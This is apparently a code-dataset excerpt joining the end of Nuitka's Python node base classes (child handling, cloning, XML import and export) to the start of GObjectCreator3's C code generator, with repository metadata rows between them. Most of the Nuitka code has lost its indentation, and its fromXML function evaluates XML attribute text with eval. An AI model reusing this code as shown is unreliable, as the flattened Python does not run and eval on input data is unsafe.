result.setCompatibleSourceReference(effective_source_ref)
return result
def makeCloneShallow(self):
args = self.getDetails()
args.update(self.getVisitableNodesNamed())
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **args)
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def getParent(self):
"""Parent of the node. Every node except modules have to have a parent."""
if self.parent is None and not self.isCompiledPythonModule():
# print self.getVisitableNodesNamed()
assert False, (self, self.source_ref)
return self.parent
def getChildName(self):
"""Return the role in the current parent, subject to changes."""
parent = self.getParent()
for key, value in parent.getVisitableNodesNamed():
if self is value:
return key
if type(value) is tuple:
if self in value:
return key, value.index(self)
return None
def getChildNameNice(self):
child_name = self.getChildName()
if hasattr(self.parent, "nice_children"):
return self.parent.nice_children[
self.parent.named_children.index(child_name)
]
elif hasattr(self.parent, "nice_child"):
return self.parent.nice_child
else:
return child_name
def getParentFunction(self):
"""Return the parent that is a function."""
parent = self.getParent()
while parent is not None and not parent.isExpressionFunctionBodyBase():
parent = parent.getParent()
return parent
def getParentModule(self):
"""Return the parent that is module."""
parent = self
while not parent.isCompiledPythonModule():
if hasattr(parent, "provider"):
# After we checked, we can use it; this is a much faster
# route to take.
parent = parent.provider
else:
parent = parent.getParent()
return parent
def isParentVariableProvider(self):
# Check if it's a closure giver, in which case it can provide variables.
return isinstance(self, ClosureGiverNodeMixin)
def getParentVariableProvider(self):
parent = self.getParent()
while not parent.isParentVariableProvider():
parent = parent.getParent()
return parent
def getParentReturnConsumer(self):
parent = self.getParent()
while (
not parent.isParentVariableProvider()
and not parent.isExpressionOutlineBody()
):
parent = parent.getParent()
return parent
def getParentStatementsFrame(self):
current = self.getParent()
while True:
if current.isStatementsFrame():
return current
if current.isParentVariableProvider():
return None
if current.isExpressionOutlineBody():
return None
current = current.getParent()
def getSourceReference(self):
return self.source_ref
def setCompatibleSourceReference(self, source_ref):
"""Bug compatible line numbers information.
As CPython outputs the last bit of bytecode executed, and not the
line of the operation. For example calls, output the line of the
last argument, as opposed to the line of the operation start.
For tests, we wants to be compatible. In improved more, we are
not being fully compatible, and just drop it altogether.
"""
# Getting the same source reference can be dealt with quickly, so do
# this first.
if (
self.source_ref is not source_ref
and Options.is_fullcompat
and self.source_ref != source_ref
):
# An attribute outside of "__init__", so we save one memory for the
# most cases. Very few cases involve splitting across lines.
# false alarm for non-slot:
# pylint: disable=I0021,assigning-non-slot,attribute-defined-outside-init
self.effective_source_ref = source_ref
def getCompatibleSourceReference(self):
"""Bug compatible line numbers information.
See above.
"""
return getattr(self, "effective_source_ref", self.source_ref)
def asXml(self):
line = self.source_ref.getLineNumber()
result = TreeXML.Element("node", kind=self.__class__.__name__, line="%s" % line)
compat_line = self.getCompatibleSourceReference().getLineNumber()
if compat_line != line:
result.attrib["compat_line"] = str(compat_line)
for key, value in iterItems(self.getDetailsForDisplay()):
result.set(key, str(value))
for name, children in self.getVisitableNodesNamed():
role = TreeXML.Element("role", name=name)
result.append(role)
if children is None:
role.attrib["type"] = "none"
elif type(children) not in (list, tuple):
role.append(children.asXml())
else:
role.attrib["type"] = "list"
for child in children:
role.append(child.asXml())
return result
@classmethod
def fromXML(cls, provider, source_ref, **args):
# Only some things need a provider, pylint: disable=unused-argument
return cls(source_ref=source_ref, **args)
def asXmlText(self):
xml = self.asXml()
return TreeXML.toString(xml)
def dump(self, level=0):
Tracing.printIndented(level, self)
Tracing.printSeparator(level)
for visitable in self.getVisitableNodes():
visitable.dump(level + 1)
Tracing.printSeparator(level)
@staticmethod
def isStatementsFrame():
return False
@staticmethod
def isCompiledPythonModule():
# For overload by module nodes
return False
def isExpression(self):
return self.kind.startswith("EXPRESSION_")
def isStatement(self):
return self.kind.startswith("STATEMENT_")
def isExpressionBuiltin(self):
return self.kind.startswith("EXPRESSION_BUILTIN_")
@staticmethod
def isExpressionConstantRef():
return False
@staticmethod
def isExpressionOperationUnary():
return False
@staticmethod
def isExpressionOperationBinary():
return False
@staticmethod
def isExpressionOperationInplace():
return False
@staticmethod
def isExpressionComparison():
return False
@staticmethod
def isExpressionSideEffects():
return False
@staticmethod
def isExpressionMakeSequence():
return False
@staticmethod
def isNumberConstant():
return False
@staticmethod
def isExpressionCall():
return False
@staticmethod
def isExpressionFunctionBodyBase():
return False
@staticmethod
def isExpressionOutlineFunctionBase():
return False
def visit(self, context, visitor):
visitor(self)
for visitable in self.getVisitableNodes():
visitable.visit(context, visitor)
@staticmethod
def getVisitableNodes():
return ()
@staticmethod
def getVisitableNodesNamed():
"""Named children dictionary.
For use in debugging and XML output.
"""
return ()
@staticmethod
def getName():
"""Name of the node if any."""
return None
@staticmethod
def mayHaveSideEffects():
"""Unless we are told otherwise, everything may have a side effect."""
return True
def isOrderRelevant(self):
return self.mayHaveSideEffects()
def extractSideEffects(self):
"""Unless defined otherwise, the expression is the side effect."""
return (self,)
@staticmethod
def mayRaiseException(exception_type):
"""Unless we are told otherwise, everything may raise everything."""
# Virtual method, pylint: disable=unused-argument
return True
@staticmethod
def mayReturn():
"""May this node do a return exit, to be overloaded for things that might."""
return False
@staticmethod
def mayBreak():
return False
@staticmethod
def mayContinue():
return False
def needsFrame(self):
"""Unless we are tolder otherwise, this depends on exception raise."""
return self.mayRaiseException(BaseException)
@staticmethod
def willRaiseException(exception_type):
"""Unless we are told otherwise, nothing may raise anything."""
# Virtual method, pylint: disable=unused-argument
return False
@staticmethod
def isStatementAborting():
"""Is the node aborting, control flow doesn't continue after this node."""
return False
class CodeNodeMixin(object):
# Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
assert name is not None
self.name = name
self.code_prefix = code_prefix
# The code name is determined on demand only.
self.code_name = None
# The "UID" values of children kinds are kept here.
self.uids = {}
def getName(self):
return self.name
def getCodeName(self):
if self.code_name is None:
provider = self.getParentVariableProvider().getEntryPoint()
parent_name = provider.getCodeName()
uid = "_%d" % provider.getChildUID(self)
assert isinstance(self, CodeNodeMixin)
if self.name:
name = uid + "_" + self.name.strip("<>")
else:
name = uid
if str is not bytes:
name = name.encode("ascii", "c_identifier").decode()
self.code_name = "%s$$$%s_%s" % (parent_name, self.code_prefix, name)
return self.code_name
def getChildUID(self, node):
if node.kind not in self.uids:
self.uids[node.kind] = 0
self.uids[node.kind] += 1
return self.uids[node.kind]
class ChildrenHavingMixin(object):
# Mixins are not allowed to specify slots.
__slots__ = ()
named_children = ()
checkers = {}
def __init__(self, values):
assert (
type(self.named_children) is tuple and self.named_children
), self.named_children
# TODO: Make this true.
# assert len(self.named_children) > 1, self.kind
# Check for completeness of given values, everything should be there
# but of course, might be put to None.
if set(values.keys()) != set(self.named_children):
raise NuitkaNodeDesignError(
"Must pass named children in value dictionary",
set(values.keys()),
set(self.named_children),
)
for name, value in values.items():
if name in self.checkers:
value = self.checkers[name](value)
if type(value) is tuple:
assert None not in value, name
for val in value:
val.parent = self
elif value is None:
pass
else:
value.parent = self
attr_name = "subnode_" + name
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload; provide self.checkers instead.
"""
# Only accept legal child names
assert name in self.named_children, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if name in self.checkers:
value = self.checkers[name](value)
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def clearChild(self, name):
# Only accept legal child names
assert name in self.named_children, name
if name in self.checkers:
self.checkers[name](None)
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not None
setattr(self, attr_name, None)
def getChild(self, name):
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
result = []
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
if value is None:
pass
elif type(value) is tuple:
result += list(value)
elif isinstance(value, NodeBase):
result.append(value)
else:
raise AssertionError(
self, "has illegal child", name, value, value.__class__
)
return tuple(result)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
yield name, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node. As an added difficulty, the old node
# might be an element of a tuple, in which case we may also
# remove that element by setting it to None.
for key in self.named_children:
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node)
for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
values = {}
for key in self.named_children:
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
for c in self.getVisitableNodes():
c.finalize()
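# Hedged sketch (editor's addition) of the storage convention used by the
# mixin above: each named child "x" lives in a plain attribute "subnode_x",
# so child access is just getattr/setattr under the hood.
def _example_subnode_access(node, name):
    """illustrative only; equivalent to ChildrenHavingMixin.getChild"""
    return getattr(node, "subnode_" + name)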
class ClosureGiverNodeMixin(CodeNodeMixin):
"""Base class for nodes that provide variables for closure takers."""
# Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
CodeNodeMixin.__init__(self, name=name, code_prefix=code_prefix)
self.temp_variables = {}
self.temp_scopes = {}
self.preserver_id = 0
def hasProvidedVariable(self, variable_name):
return self.locals_scope.hasProvidedVariable(variable_name)
def getProvidedVariable(self, variable_name):
if not self.locals_scope.hasProvidedVariable(variable_name):
variable = self.createProvidedVariable(variable_name=variable_name)
self.locals_scope.registerProvidedVariable(variable)
return self.locals_scope.getProvidedVariable(variable_name)
@abstractmethod
def createProvidedVariable(self, variable_name):
"""Create a variable provided by this function."""
def allocateTempScope(self, name):
self.temp_scopes[name] = self.temp_scopes.get(name, 0) + 1
return "%s_%d" % (name, self.temp_scopes[name])
def allocateTempVariable(self, temp_scope, name, temp_type=None):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
assert name != "result"
full_name = name
# No duplicates please.
assert full_name not in self.temp_variables, full_name
result = self.createTempVariable(temp_name=full_name, temp_type=temp_type)
# Late added temp variables should be treated with care for the
# remaining trace.
if self.trace_collection is not None:
self.trace_collection.initVariableUnknown(result).addUsage()
return result
def createTempVariable(self, temp_name, temp_type):
if temp_name in self.temp_variables:
return self.temp_variables[temp_name]
if temp_type is None:
temp_class = Variables.TempVariable
elif temp_type == "bool":
temp_class = Variables.TempVariableBool
else:
assert False, temp_type
result = temp_class(owner=self, variable_name=temp_name)
self.temp_variables[temp_name] = result
return result
def getTempVariable(self, temp_scope, name):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
full_name = name
return self.temp_variables[full_name]
def getTempVariables(self):
return self.temp_variables.values()
def _removeTempVariable(self, variable):
del self.temp_variables[variable.getName()]
def optimizeUnusedTempVariables(self):
remove = []
for temp_variable in self.getTempVariables():
empty = self.trace_collection.hasEmptyTraces(variable=temp_variable)
if empty:
remove.append(temp_variable)
for temp_variable in remove:
self._removeTempVariable(temp_variable)
def allocatePreserverId(self):
if python_version >= 0x300:
self.preserver_id += 1
return self.preserver_id
class ClosureTakerMixin(object):
"""Mixin for nodes that accept variables from closure givers."""
# Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, provider):
self.provider = provider
self.taken = set()
def getParentVariableProvider(self):
return self.provider
def getClosureVariable(self, variable_name):
result = self.provider.getVariableForClosure(variable_name=variable_name)
assert result is not None, variable_name
if not result.isModuleVariable():
self.addClosureVariable(result)
return result
def addClosureVariable(self, variable):
self.taken.add(variable)
return variable
def getClosureVariables(self):
return tuple(
sorted(
[take for take in self.taken if not take.isModuleVariable()],
key=lambda x: x.getName(),
)
)
def getClosureVariableIndex(self, variable):
closure_variables = self.getClosureVariables()
for count, closure_variable in enumerate(closure_variables):
if variable is closure_variable:
return count
raise IndexError(variable)
def hasTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return True
return False
def getTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return variable
return None
class StatementBase(NodeBase):
"""Base class for all statements."""
# Base classes can be abstract, pylint: disable=abstract-method
# TODO: Have them all.
# @abstractmethod
@staticmethod
def getStatementNiceName():
return "undescribed statement"
def computeStatementSubExpressions(self, trace_collection):
"""Compute a statement.
Default behavior is to just visit the child expressions first, and
then the node "computeStatement". For a few cases this needs to
be overloaded.
"""
expressions = self.getVisitableNodes()
for count, expression in enumerate(expressions):
assert expression.isExpression(), (self, expression)
expression = trace_collection.onExpression(expression=expression)
if expression.willRaiseException(BaseException):
wrapped_expression = makeStatementOnlyNodesFromExpressions(
expressions[: count + 1]
)
assert wrapped_expression is not None
return (
wrapped_expression,
"new_raise",
lambda: "For %s the child expression '%s' will raise."
% (self.getStatementNiceName(), expression.getChildNameNice()),
)
return self, None, None
class StatementChildrenHavingBase(ChildrenHavingMixin, StatementBase):
def __init__(self, values, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
ChildrenHavingMixin.__init__(self, values=values)
class StatementChildHavingBase(StatementBase):
named_child = ""
checker = None
def __init__(self, value, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
assert type(self.named_child) is str and self.named_child
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
assert type(value) is not list, self.named_child
if type(value) is tuple:
assert None not in value, self.named_child
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + self.named_child
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload; provide self.checker instead.
"""
# Only accept legal child names
assert name == self.named_child, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def getChild(self, name):
# Only accept legal child names
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
if value is None:
return ()
elif type(value) is tuple:
return value
elif isinstance(value, NodeBase):
return (value,)
else:
raise AssertionError(self, "has illegal child", value, value.__class__)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
yield self.named_child, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node. As an added difficulty, the old node
# might be an element of a tuple, in which case we may also
# remove that element by setting it to None.
key = self.named_child
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node) for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
# Make clones of child nodes too.
values = {}
key = self.named_child
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
attr_name = "subnode_" + self.named_child
child = getattr(self, attr_name)
if child is not None:
child.finalize()
delattr(self, attr_name)
class SideEffectsFromChildrenMixin(object):
# Mixins are not allowed to specify slots.
__slots__ = ()
def mayHaveSideEffects(self):
for child in self.getVisitableNodes():
if child.mayHaveSideEffects():
return True
return False
def extractSideEffects(self):
# No side effects at all but from the children.
result = []
for child in self.getVisitableNodes():
result.extend(child.extractSideEffects())
return tuple(result)
def computeExpressionDrop(self, statement, trace_collection):
# Expression only statement plays no role, pylint: disable=unused-argument
side_effects = self.extractSideEffects()
# TODO: Have a method for nicer output and remove existing overloads
# by using classes and prefer generic implementation here.
if side_effects:
return (
makeStatementOnlyNodesFromExpressions(side_effects),
"new_statements",
"Lowered unused expression %s to its side effects." % self.kind,
)
else:
return (
None,
"new_statements",
"Removed %s without side effects." % self.kind,
)
def makeChild(provider, child, source_ref):
child_type = child.attrib.get("type")
if child_type == "list":
return [
fromXML(provider=provider, xml=sub_child, source_ref=source_ref)
for sub_child in child
]
elif child_type == "none":
return None
else:
return fromXML(provider=provider, xml=child[0], source_ref=source_ref)
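# Hedged sketch (editor's addition): the "none" branch of makeChild, driven
# by a hand-built element. TreeXML elements are ElementTree-compatible, so
# the standard library suffices for this demonstration.
def _example_make_child_none():
    from xml.etree.ElementTree import Element
    role = Element("role", name="value", type="none")
    return makeChild(None, role, None)  # -> None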
def getNodeClassFromKind(kind):
return NodeCheckMetaClass.kinds[kind]
def extractKindAndArgsFromXML(xml, source_ref):
kind = xml.attrib["kind"]
args = dict(xml.attrib)
del args["kind"]
if source_ref is None:
source_ref = SourceCodeReference.fromFilenameAndLine(
args["filename"], int(args["line"])
)
del args["filename"]
del args["line"]
else:
source_ref = source_ref.atLineNumber(int(args["line"]))
del args["line"]
node_class = getNodeClassFromKind(kind)
return kind, node_class, args, source_ref
def fromXML(provider, xml, source_ref=None):
assert xml.tag == "node", xml
kind, node_class, args, source_ref = extractKindAndArgsFromXML(xml, source_ref)
if "constant" in args:
# TODO: Try and reduce/avoid this, use marshal and/or pickle from a file
# global stream instead. For now, this will do. pylint: disable=eval-used
args["constant"] = eval(args["constant"])
if kind in (
"ExpressionFunctionBody",
"PythonMainModule",
"PythonCompiledModule",
"PythonCompiledPackage",
"PythonInternalModule",
):
delayed = node_class.named_children
if "code_flags" in args:
args["future_spec"] = fromFlags(args["code_flags"])
else:
delayed = ()
for child in xml:
assert child.tag == "role", child.tag
child_name = child.attrib["name"]
# Might want to wait until the provider is updated with some
# children. In these cases, we pass the XML node, rather
# than a Nuitka node.
if child_name not in delayed:
args[child_name] = makeChild(provider, child, source_ref)
else:
args[child_name] = child
try:
return node_class.fromXML(provider=provider, source_ref=source_ref, **args)
except (TypeError, AttributeError):
Tracing.printLine(node_class, args, source_ref)
raise
|
apache-2.0
| 8,789,145,488,713,669,000
| 28.308013
| 88
| 0.594856
| false
| 4.418701
| false
| false
| false
|
ThomasBollmeier/GObjectCreator3
|
src/gobjcreator3/codegen/c_code_generator.py
|
1
|
29821
|
from gobjcreator3.codegen.code_generator import CodeGenerator
from gobjcreator3.codegen.output import StdOut
from gobjcreator3.codegen.name_creator import NameCreator
from gobjcreator3.codegen.c_marshaller_generator import CMarshallerGenerator, CMarshallerNameCreator
from gobjcreator3.model.type import Type
from gobjcreator3.model.visibility import Visibility
from gobjcreator3.model.method import Parameter
from gobjcreator3.model.property import PropType, PropAccess
from gobjcreator3.model.ginterface import GInterface
import os
import re
import faberscriptorum
class CGenConfig(object):
def __init__(self):
self.generate_base_functions = False
self.generate_constructor = False
self.generate_setter_getter = False
self.verbose = False
self.header_text_file = ""
self.directory_per_module = True
class CCodeGenerator(CodeGenerator):
def __init__(self, root_module, origin, out=StdOut(), config=CGenConfig()):
CodeGenerator.__init__(self, root_module, origin, out)
self._config = config
self._dir_stack = []
self._cur_dir = ""
self._name_creator = NameCreator()
self._template_dir = os.path.dirname(__file__) + os.sep + "templates" + os.sep + "c"
self._refresh_template_processor()
self._regex_type_w_ptrs = re.compile(r"(\w+)(\s*)(\*+)")
def generate(self):
self._generate_module(self._root_module)
def _generate_module(self, module):
if self._config.directory_per_module:
if self._cur_dir:
self._cur_dir += os.sep + module.name
else:
self._cur_dir = module.name
self._dir_stack.append(self._cur_dir)
self._out.enter_dir(self._cur_dir)
for m in module.modules:
self._generate_module(m)
self._refresh_template_processor()
self._setup_module_symbols(module)
objs = [obj for obj in module.objects if obj.filepath_origin == self._origin]
for obj in objs:
self._setup_gobject_symbols(obj)
self._gen_object_header(obj)
self._gen_object_prot_header(obj)
self._gen_object_source(obj)
if obj.has_signals():
self._gen_object_marshallers(obj)
intfs = [intf for intf in module.interfaces if intf.filepath_origin == self._origin]
for intf in intfs:
self._setup_ginterface_symbols(intf)
self._gen_interface_header(intf)
self._gen_interface_source(intf)
if intf.signals:
self._gen_object_marshallers(intf)
enums = [enum for enum in module.enumerations if enum.filepath_origin == self._origin]
for enum in enums:
self._setup_genum_symbols(enum)
self._gen_enum_header(enum)
self._gen_enum_source(enum)
all_flags = [flags for flags in module.flags if flags.filepath_origin == self._origin]
for flags in all_flags:
self._setup_gflags_symbols(flags)
self._gen_flags_header(flags)
self._gen_flags_source(flags)
error_domains = [error_domain for error_domain in module.error_domains if error_domain.filepath_origin == self._origin]
for error_domain in error_domains:
self._setup_gerror_symbols(error_domain)
self._gen_error_header(error_domain)
if self._config.directory_per_module:
self._out.exit_dir(self._cur_dir)
self._dir_stack.pop()
if self._dir_stack:
self._cur_dir = self._dir_stack[-1]
else:
self._cur_dir = ""
def _gen_object_header(self, obj):
file_path = self._full_path(self._name_creator.create_obj_header_name(obj))
lines = self._get_lines_from_template("gobject_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_prot_header(self, obj):
if not obj.has_protected_members() and obj.is_final:
return
file_path = self._full_path(self._name_creator.create_obj_prot_header_name(obj))
lines = self._get_lines_from_template("gobject_header_prot.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_source(self, obj):
file_path = self._full_path(self._name_creator.create_obj_source_name(obj))
lines = self._get_lines_from_template("gobject_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_header(self, intf):
file_path = self._full_path(self._name_creator.create_obj_header_name(intf))
lines = self._get_lines_from_template("ginterface_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_source(self, intf):
file_path = self._full_path(self._name_creator.create_obj_source_name(intf))
lines = self._get_lines_from_template("ginterface_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_marshallers(self, clif):
is_interface = isinstance(clif, GInterface)
header_guard = "__"
modprefix = self._template_processor.getSymbol("MODULE_PREFIX")
if modprefix:
header_guard += modprefix + "_"
if not is_interface:
header_guard += self._template_processor.getSymbol("CLASS_NAME")
else:
header_guard += self._template_processor.getSymbol("INTF_NAME")
header_guard += "_MARSHALLER_H__"
if not is_interface:
prefix = self._template_processor.getSymbol("class_prefix")
else:
prefix = self._template_processor.getSymbol("intf_prefix")
signals = clif.get_signals()
generator = CMarshallerGenerator(
self._header_comment(),
header_guard,
prefix,
signals,
self._out
)
header_file_path = self._full_path(self._name_creator.create_obj_marshaller_header_name(clif))
if self._config.verbose:
print("generating %s..." % header_file_path, end="")
generator.generate_header(header_file_path)
if self._config.verbose:
print("done")
source_file_path = self._full_path(self._name_creator.create_obj_marshaller_source_name(clif))
if self._config.verbose:
print("generating %s..." % source_file_path, end="")
generator.generate_source(source_file_path)
if self._config.verbose:
print("done")
def _gen_enum_header(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".h")
lines = self._get_lines_from_template("genum_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_enum_source(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".c")
lines = self._get_lines_from_template("genum_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_header(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".h")
lines = self._get_lines_from_template("gflags_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_source(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".c")
lines = self._get_lines_from_template("gflags_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_error_header(self, error_domain):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(error_domain) + ".h")
lines = self._get_lines_from_template("gerror_header.template", file_path)
self._create_text_file(file_path, lines)
def _full_path(self, basename):
if self._cur_dir:
return self._cur_dir + os.sep + basename
else:
return basename
def _create_text_file(self, file_path, lines):
if self._config.verbose:
print("generating %s..." % file_path, end="")
self._out.visit_text_file(file_path, lines)
if self._config.verbose:
print("done")
def _get_lines_from_template(self, template_file, file_path):
self._out.prepare_file_creation(file_path, self._template_processor)
template_path = self._template_dir + os.sep + template_file
template_path = os.path.abspath(template_path)
out_buffer = self._template_processor.createStringOut()
self._template_processor.createCode(template_path, out_buffer)
lines = out_buffer.content.split(os.linesep)
# Remove adjacent empty lines:
res = []
prev = None
for line in lines:
line = line.rstrip()
if line:
res.append(line)
else:
if prev is None or prev:
res.append(line)
prev = line
return res
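# Editor's note (hedged): the loop above collapses runs of blank lines,
# e.g. ["a", "", "", "b"] becomes ["a", "", "b"].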
def _refresh_template_processor(self):
self._template_processor = faberscriptorum.API()
self._template_processor.setEditableSectionStyle(self._template_processor.Language.C)
self._template_processor.setIncludePath([self._template_dir])
self._template_processor["header_comment"] = self._header_comment()
self._template_processor["config"] = self._config
self._template_processor["TRUE"] = True
self._template_processor["FALSE"] = False
self._template_processor["PUBLIC"] = Visibility.PUBLIC
self._template_processor["PROTECTED"] = Visibility.PROTECTED
self._template_processor["PRIVATE"] = Visibility.PRIVATE
self._template_processor["OBJECT"] = Type.OBJECT
self._template_processor["INTERFACE"] = Type.INTERFACE
self._template_processor["type_name"] = self._name_creator.create_full_type_name
self._template_processor["TYPE_MACRO"] = self._name_creator.create_type_macro
self._template_processor["CAST_MACRO"] = self._name_creator.create_cast_macro
self._template_processor["increment"] = self._increment
self._template_processor["is_empty"] = self._is_empty
self._template_processor["is_none"] = self._is_none
self._template_processor["literal_trim"] = self._literal_trim
self._template_processor["length"] = self._length
self._template_processor["to_upper"] = self._to_upper
self._template_processor["to_lower"] = self._to_lower
self._template_processor["rearrange_asterisk"] = self._rearrange_asterisk
self._template_processor["method_basename"] = self._method_basename
self._template_processor["method_result"] = self._method_result
self._template_processor["method_signature"] = self._method_signature
self._template_processor["method_signature_by_name"] = self._method_signature_by_name
self._template_processor["method_by_name"] = self._method_by_name
self._template_processor["method_call_args"] = self._method_call_args
self._template_processor["method_def_class"] = self._method_def_class
self._template_processor["method_def_class_cast"] = self._method_def_class_cast
def _setup_module_symbols(self, module):
camel_case_prefix = module.name.capitalize()
curmod = module
while curmod.module:
curmod = curmod.module
if curmod.name:
camel_case_prefix = curmod.name.capitalize() + camel_case_prefix
prefix = self._name_creator.replace_camel_case(camel_case_prefix, "_")
self._template_processor["module_prefix"] = self._module_prefix(module)
self._template_processor["MODULE_PREFIX"] = prefix.upper()
self._template_processor["ModulePrefix"] = camel_case_prefix
self._template_processor["filename_wo_suffix"] = self._name_creator.create_filename_wo_suffix
def _setup_gobject_symbols(self, obj):
self._template_processor["class"] = obj
self._template_processor["ClassName"] = obj.name
self._template_processor["CLASS_NAME"] = self._name_creator.replace_camel_case(obj.name, "_").upper()
self._template_processor["FullClassName"] = self._template_processor.getSymbol("ModulePrefix") + obj.name
prefix = obj.cfunc_prefix or self._name_creator.replace_camel_case(obj.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["class_prefix"] = prefix
self._template_processor["protected_header"] = self._name_creator.create_obj_prot_header_name
self._template_processor["marshaller_header"] = self._name_creator.create_obj_marshaller_header_name
self._template_processor["hasProtectedMembers"] = obj.has_protected_members()
self._template_processor["PROP_NAME"] = self._name_creator.create_property_enum_value
self._template_processor["prop_tech_name"] = self._name_creator.create_property_tech_name
self._template_processor["PropType"] = PropType
self._template_processor["PropAccess"] = PropAccess
self._template_processor["prop_value"] = self._property_value
self._template_processor["prop_gtype"] = self._property_gtype
self._template_processor["prop_flags"] = self._property_flags
self._template_processor["prop_setter_section"] = self._property_setter_section
self._template_processor["prop_getter_section"] = self._property_getter_section
self._template_processor["prop_set_section"] = self._property_setter_section
self._template_processor["prop_get_section"] = self._property_getter_section
self._template_processor["is_prop_init_required"] = self._is_property_init_required
self._template_processor["signal_tech_name"] = self._signal_technical_name
self._template_processor["signal_section_defhandler"] = self._signal_section_defhandler
if obj.has_signals():
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
self._template_processor["interface_impl_funcname"] = self._interface_impl_funcname
def _setup_ginterface_symbols(self, intf):
self._template_processor["intf"] = intf
self._template_processor["INTF_NAME"] = self._name_creator.replace_camel_case(intf.name, "_").upper()
prefix = intf.cfunc_prefix or self._name_creator.replace_camel_case(intf.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["intf_prefix"] = prefix
if intf.signals:
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
